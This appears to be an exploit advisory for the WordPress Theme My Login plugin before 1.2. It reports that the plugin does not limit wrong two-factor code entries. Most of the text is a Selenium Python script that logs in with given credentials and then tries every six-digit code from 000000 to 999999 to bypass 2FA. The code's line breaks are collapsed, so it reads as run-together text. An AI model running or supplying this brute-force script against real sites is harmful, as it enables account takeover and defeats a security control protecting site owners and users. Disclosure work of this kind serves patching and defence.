WordPress Theme My Login 2FA Brute Force

The theme my login plugin before 1.2 does not check how often a 2FA code was wrongly entered, allowing a bruteforce of codes to bypass 2FA effectively. A working python exploit:from typing import KeysViewfrom selenium.webdriver.common.by import Byfrom selenium import webdriverfrom selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC driver = webdriver.Firefox()driver.get("websiteloginhere")# Locate the username field by its 'id' attribute and fill it in username_field = driver.find_element(By.ID, "user_login") username_field.click() username_field.send_keys("usernamehere")  # Locate the password field by its 'id' attribute and fill it in password_field = driver.find_element(By.ID, "user_pass") password_field.click() password_field.send_keys("passwordhere") # Locate the Log In button and click it login_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']") login_button.click() # FROM HERE, keep doing this from 000000 till 999999 or till you can not find the input anymore after waiting  for i in range(1000000):  code = str(i).zfill(6)   try:  wait = WebDriverWait(driver, 10)  code_field = wait.until(EC.element_to_be_clickable((By.XPATH, "//input[@name='code' and @type='text']")))  except:  break   code_field.click()  code_field.clear()  code_field.send_keys(code)   verify_button = driver.find_element(By.XPATH, "//button[@name='submit' and @type='submit' and @class='tml-button']")  verify_button.click()